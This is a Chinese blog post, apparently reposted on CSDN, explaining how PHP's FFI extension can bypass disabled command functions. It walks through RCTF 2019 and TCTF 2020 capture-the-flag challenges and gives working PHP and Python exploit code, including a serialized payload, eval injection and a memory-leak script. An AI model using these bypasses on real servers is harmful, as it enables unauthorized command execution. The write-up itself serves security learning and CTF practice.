php system shell html 输出_利用 PHP 中的 FFI 扩展执行命令

最新推荐文章于 2024-01-30 12:40:45 发布
最新推荐文章于 2024-01-30 12:40:45 发布
阅读量392 收藏
点赞数 2
文章标签: php system shell html 输出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39871162/article/details/111650867
版权

点击蓝字,关注我们

本文作者:Match(团队成员)
本文字数:2300

阅读时长:10min

附件/链接:点击查看原文下载

声明:请勿用作违法用途,否则后果自负

本文属于WgpSec原创奖励计划,未经许可禁止转载

扩展简介

FFI 是在 PHP 7.4 版本中新加入的,此扩展允许在 PHP 代码中加载共享库(.DLL 或 .so),调用 C 函数及访问 C 数据结构,简单的说就是允许在 PHP 中运行 C 代码,可以方便的调用C语言的各种库,但同时它的使用伴随着很大的风险

使用配置

使用 FFI 首先要开启扩展,在 php.ini 中去掉 extension=ffi 前面的 ; 并且修改 ffi.enable=true 即可使用,在phpinfo() 中可以查看是否开启了此扩展

基本用法

FFI :: cdef  创建一个新的 FFI 对象

public static FFI::cdef ([ string $code = "" [, string $lib ]] ) : FFI

<?php 
    $ffi = FFI::cdef("int system(const char *command);");
    $ffi->system("echo Hello World>./ttmp");
    echo file_get_contents("./ttmp");
?>

结果为

Hello World

FFI :: new  创建一个C数据结构

public static FFI::new ( mixed $type [, bool $owned = TRUE [, bool $persistent = FALSE ]] ) : FFI\CData

<?php 
    $x = FFI::new("int");
    var_dump($x->cdata);
    $x->cdata = 5;
    var_dump($x->cdata);
    $x->cdata += 2;
    var_dump($x->cdata);?>

结果为

int(0)int(5)int(7)

FFI :: load  加载 C 文件

public static FFI::load ( string $filename ) : FFI

FFI :: cast  执行C类型转换

public static FFI::cast ( mixed $type , FFI\CData &$ptr ) : FFI\CData

FFI :: string  从内存区域创建一个PHP字符串

public static FFI::string ( FFI\CData &$ptr [, int $size ] ) : string

FFI :: memcpy  将一个存储区复制到另一个

public static FFI::memcpy ( FFI\CData &$dst , mixed &$src , int $size ) : void

命令执行

这意味着如果目标机器开启了这一扩展,我们就有了一种全新的命令执行方式,在 system 被禁用的情况下,则可使用 FFI 来进行命令执行,例如在题目中执行 /readflag 并获取 flag,同时它也可以加载自定义链接库

<?php 
    $ffi = FFI::cdef("int system(const char *command);");
    $ffi->system("/readflag > /tmp/123");echo file_get_contents("/tmp/123");
    @unlink("/tmp/123");?>

这段代码首先创建了一个新的 FFI 对象调用 Linux 库的 int system(const char* command) 函数,作用是把 command 指定的命令名称或程序名称传给要被命令处理器执行的主机环境,并在命令完成后返回。之后我们就可以通过这种方式来调用 system 函数执行命令并将结果输出到临时文件,再读取文件内容并显示在页面,最后删除创建的临时文件

类似的方法在蚁剑的 bypass disable_function 中可自动调用,但受到目录权限和 open_basedir 的限制导致很多情况下并不起作用

2f9cf84758816747da7d5051d89f3388.png

在一些大型的比赛中,则更需要灵活的运用

比赛真题

RCTF 2019

在 2019 年的 RCTF 中,出现了一道通过反序列化调用 FFI 扩展的命令执行,在 BUUCTF 中提供了复现环境

题目代码:

<?php if (isset($_GET['a'])) {eval($_GET['a']);
    } else {
        show_source(__FILE__);
}

禁用了

set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,putenv,error_log,dl

open_basedir 被限制在 /var/www/html/

另外的 prepare.php 中关键代码

final class A implements Serializable {
protected $data = [
'ret' => null,
'func' => 'print_r',
'arg' => '1'
    ];

private function run () {
$this->data['ret'] = $this->data['func']($this->data['arg']);
    }
    ......
}

可以看出这里需要通过反序列化调用 FFI 模块执行命令

payload:

<?php final class A implements Serializable {protected $data = ['ret' => null,'func' => 'FFI::cdef','arg' => 'int system(const char* command);'
        ];public function serialize (): string {return serialize($this->data);
        }public function unserialize($payload) {$this->data = unserialize($payload);$this->run();
        }
    }
    $ccc = new A();echo serialize($ccc);?>

传入内容为:

?a=$a=unserialize('C:1:"A":95:{a:3:{s:3:"ret";N;s:4:"func";s:9:"FFI::cdef";s:3:"arg";s:32:"int system(const char* command);";}}');var_dump($a->ret->system('ls'));

即可利用 FFI 扩展进行命令执行

TCTF 2020

同样,在今年的 TCTF 中也出现了 FFI 的内容,比赛中一共有两道相关题目,都是连接 shell 后需要通过 FFI 绕过限制执行文件

题目代码:

<?php if (isset($_GET['rh'])) {eval($_GET['rh']);
    } else {
        show_source(__FILE__);
}

第一题可直接读取根目录 flag.h 文件获取方法名 flag_fUn3t1on_fFi,之后通过 eval 函数执行 FFI 脚本即可

$ffi = FFI::load("/flag.h");var_dump(FFI::string($ffi->flag_fUn3t1on_fFi()));

第二题无法读取文件,并且禁用了 cdef ,需要通过泄露内存获得方法名进而执行命令,脚本转自一叶飘零师傅博客

import requests
url = "http://pwnable.org:19261"
params = {"rh":
'''
try {$ffi=FFI::load("/flag.h");
    //get flag
    //$a = $ffi->flag_wAt3_uP_apA3H1();
    //for($i = 0; $i < 128; $i++){
        echo $a[$i];
    //}$a = $ffi->new("char[8]", false);$a[0] = 'f';$a[1] = 'l';$a[2] = 'a';$a[3] = 'g';$a[4] = 'f';$a[5] = 'l';$a[6] = 'a';$a[7] = 'g';$b = $ffi->new("char[8]", false);$b[0] = 'f';$b[1] = 'l';$b[2] = 'a';$b[3] = 'g';$newa = $ffi->cast("void*", $a);
    var_dump($newa);$newb = $ffi->cast("void*", $b);
    var_dump($newb);$addr_of_a = FFI::new("unsigned long long");
    FFI::memcpy($addr_of_a, FFI::addr($newa), 8);
    var_dump($addr_of_a);$leak = FFI::new(FFI::arrayType($ffi->type('char'), [102400]), false);
    FFI::memcpy($leak, $newa-0x20000, 102400);$tmp = FFI::string($leak,102400);
    var_dump($tmp);
    //var_dump($leak);
    //$leak[0] = 0xdeadbeef;
    //$leak[1] = 0x61616161;
    //var_dump($a);
    //FFI::memcpy($newa-0x8, $leak, 128*8);
    //var_dump($a);
    //var_dump(777);
} catch (FFI\Exception $ex) {
    echo $ex->getMessage(), PHP_EOL;
}
var_dump(1);
'''
}

res = requests.get(url=url,params=params)

print((res.text).encode("utf-8"))

Reference:

https://www.php.net/manual/zh/book.ffi.php

https://skysec.top/2020/06/27/2020-TCTF-Online-Web-WriteUp/

团队招收CTF:WEB、PWN、区块链,安全研究方向的同学

扫描关注公众号回复加群,和师傅们一起讨论研究~

扫码关注我们

665c3f25c2a7b3aa0bde2440a03a7476.png

微信号:wgpsec

Twitter:@wgpsec

7170bdb9efe39ce1bfc96d10a499babd.gif

分享、在看与点赞,至少我要拥有一个吧

Hello 邀请码D598A43E1A9F1F4B8B5B715F52583D15

weixin_39871162
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php system()
刘阳龙Herman的专栏
09-14 1万+
<br />php函数system详解:<br />执行外部程序并显示输出资料。 <br />system语法: string system(string command, int [return_var]); <br />system返回值: 字符串 <br />函数种类: 操作系统与环境 <br /> <br />system内容说明 <br />本函数就像是 C 语的函数 system(),用来执行指令,并输出结果。若是 return_var 参数存在,则执行 command 之后的状态会填入 re
php system函数用法,system函数如何使用?总结system函数实例用法
weixin_29982199的博客
03-20 4618
这篇文章主要简单分析了linux下system函数,具有一定的参考价值,感兴趣的小伙伴们可以参考一下简单分析了linux下system函数的相关内容,具体内容如下intlibc_system (const char *line){if (line == NULL)/* Check that we have a command processor available. It mightnot be ...
php-ffi-go-example:通过FFIPHP调用GO函数
05-11
PHP FFI GO示例 刚刚尝试通过FFIPHP调用GO函数。 怎么跑? 确保在php.ini具有PHP 7.4和ffi.enable=true 。 克隆此存储库。 git clone https://github.com/eislambey/php-ffi-go-example.git 编译libutil.so go build -o libutil.so -buildmode=c-shared util.go 跑步 php example.php php http_client_example.php 参考
php 编译FFI
最新发布
u013373006的博客
01-30 425
【代码】php 编译FFI
PHP的system函数
hello PHP的博客
12-20 9957
PHP代码如下: <?php $v = system('netstat -tnlp',$shell_return); var_dump($shell_return); var_dump($v); 执行结果: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address ...
php shell html 输出_PHP常用命令行
weixin_39762441的博客
12-08 119
php文网最新课程每日17点准时技术干货分享1、PHP运行指定文件php -f test.php (-f 可省略)2、命令行直接运行PHP代码php -r "phpinfo();"如果结果太长,还可以 php -r “phpinfo();” | less 分页展示3、交互模式运行PHP简单的运算control + c/z 或者 exit 退出交互模式函数上面输出结果返回的数据类型为...
php system 命令,在PHP项目利用system函数执行shell命令
weixin_34582773的博客
03-09 1550
摘要:在php项目开发,如果能够在项目内执行shell命令,将可以实现更多的功能;此外,如果可以用具有同php相同功能的shell命令来替代,也可以提升项目的性能和效率。而php的system函数就可以实现在php执行shell命令。 在php项目开发,如果能够在项目内执行shell命令,将可以实现更多的功能;此外,如果可以用具有同php相同功能的shell命令来替代,也可以提升项目的...
php7.4 ffi,PHP7.4FFI的介绍(代码示例)
weixin_32937021的博客
03-11 475
本篇文章给大家带来的内容是关于PHP7.4FFI的介绍(代码示例),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。FFI扩展已经通过RFC,正式成为PHP 7.4核心扩展。什么是FFIFFI(Foreign Function Interface),即外部函数接口,是指在一种语言里调用另一种语言代码的技术。PHPFFI扩展就是一个让你在PHP里调用C代码的技术。FFI的使用非常简...
PHP执行系统命令的4个方法 : system , shell_exec , exec , passthru
刘宇(LY)个人笔记
11-05 9890
通过执行系统命令,我们可以调用系统的一些功能,甚至能与其他语言进行交互。 1 system() : system — 执行外部程序(命令行),并且显示输出 这个函数会将结果直接进行输出 (注意:是直接输出区别于返回值,因为这个,我一般不用它),命令成功后返回输出的最后一行,失败返回FALSE 2 shell_exec(): shell_exec — 通过 shell 环境执行命令 ( 这就意味着这...
php FFI扩展操作动态链接库 操作DLL文件 so文件
double_jin2007的博客
11-18 270
提示这个错误可能是应为别人开发的动态库 可能有c的头文件 也就是对应的 test.h文件要和test.dll文件一个目录下,php从7.4版本以后内置了FFI扩展,估计是时间太短的原因,网路上相关文章比较少,大部分都是搬用的官网的说明。另外一个原因就是编写的动态库可能是win32的 需要用win32的php程序才能执行。另外在linux环境下 好像FFi是无法加载dll动态库 只能编译成.so文件。最近有个项目需要访问C编写的动态库的函数 所以用到了FFI这个扩展。安装扩展的方法就不说了。
php system引用外部文件夹,自研 PHP 框架 1.0_system 文件夹说明
weixin_39848970的博客
03-11 125
目录结构systemconstant.phpfunction.phpurl.phpsystem文件夹用来放置构建框架环境的所有文件。1.0 版本只提供了路由解析功能,由 url.php 提供;constant.php 用来定义常量,function.php 则是框架级的函数库,与之对应,APP 可以定义应用级的函数库,如果存在应用级的函数库,两者之间的关系是上下级。constant.php 和...
php安全模式system,php安全模式详细介绍
weixin_29118723的博客
03-10 328
php安全模式:safe_mode=on|off启用safe_mode指令将对在共享环境使用PHP时可能有危险的语言特性有所限制。可以将safe_mode是指为布尔值on来启用,或者设置为 off禁用。它会比较执行脚本UID(用户ID)和脚本尝试访问的文件的UID,以此作为限制机制的基础。如果UID相同,则执行脚本;否则,脚本失败。具体地,当启用安全模式时,一些限制将生效。1、 所有输入输出函数...
php system漏洞,命令执行漏洞
weixin_34060773的博客
03-19 1089
命令执行应用有时需要调用一些执行系统命令的函数,如PHP的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令,从而造成命令执行攻击,这就是命令执行漏洞。利用条件应用调用执行系统命令的函数将用户输入作为系统命令的参数拼接到了命令行没有对用户输入进行过滤或过滤不严漏洞分类代码层过滤...
php system函数攻击,禁用php的system函数以获取shell访问
weixin_42180863的博客
04-09 673
禁用php的system函数以获取shell访问2016-05-03 21:23:03 来源:360安全播报 阅读:2128次分享到:您可以禁用PHP函数如果你拥有一个运行着PHP的Web服务器,禁用一些PHP的危险功能可能是一个好主意,其有些功能也许是你的网站所不需要的 。如果攻击者设法在你的服务器上运...
ffi php,PHP-FFI: FFI PHP 扩展提供了一种调用本地函数,访问本地变量和创建/访问用 C 语言定义的数据结构的简单方法...
weixin_33046983的博客
03-12 273
FFI PHP extension (Foreign Function Interface)This extension has been merged into php main source tree. The latest version is available as part of PHP sourcses at php.net or at github mirror !FFI PHP ...
shell html 表单 跳转,将shell输出转换为html表格
weixin_42377790的博客
06-08 475
我使用php执行服务器命令以从服务器检索日志数据,只需在php使用以下语法执行该命令即可。将shell输出转换为html表格$result = shell_exec("$cmd");echo "$result";?>上面的查询返回非结构化表格格式的输出,我需要将其转换为结构化的HTML表格并显示在网页上。我已经保存在CSV文件上面的命令输出,并使用下面的JavaScript函数格式化结果以...
PHP:exec与system区别
热门推荐
上善若水,水善利万物而不争。
09-20 1万+
PHP调用外部命令,可以用exec 及 system来实现: system() 原型:string system (string command [, int return_var]) system()函数很其它语言的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。    返回结果        成功返回0,           失败(命令不存在等原
php7.4 ffi,PHP7.4 全新扩展方式 FFI 详解
weixin_39767983的博客
03-11 253
变量提升:先获取变量再执行标签:label可以用于跳出代码块foo: {console.log(1);break foo;console.log('本行不会输出');}console.log(2);// 1// 2typeof 运算符 确定变量类型typeof windowtypeof {}typeof []typeof null以上都是Object类型null表示一个空对象,转为数值为0unde...
docker安装phpFFI扩展
07-27
根据提供的引用内容,安装dockerphpFFI扩展有以下几个步骤: 1. 进入容器: 使用命令`sudo docker exec -ti myphp /bin/bash`进入容器。 2. 安装FFI扩展: 使用命令`docker-php-ext-install ffi`安装FFI扩展。 3...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值